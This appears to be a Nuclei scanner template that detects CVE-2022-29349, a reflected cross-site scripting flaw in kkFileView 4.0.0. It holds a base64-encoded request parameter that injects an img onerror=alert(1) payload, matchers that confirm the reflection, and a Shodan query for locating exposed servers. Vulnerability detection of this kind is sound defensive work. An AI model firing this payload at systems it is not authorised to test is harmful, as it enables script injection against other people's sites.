46 lines
1.2 KiB
YAML
46 lines
1.2 KiB
YAML
id: CVE-2022-29349
|
|
|
|
info:
|
|
name: kkFileView 4.0.0 - Cross-Site Scripting
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
|
|
reference:
|
|
- https://github.com/kekingcn/kkFileView/issues/347
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29349
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-29349
|
|
cwe-id: CWE-79
|
|
epss-score: 0.02254
|
|
cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: http.html:"kkFileView"
|
|
verified: true
|
|
vendor: keking
|
|
product: kkfileview
|
|
tags: cve,cve2022,kkFileView,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'txt"><img src=111 onerror=alert(1)>123'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|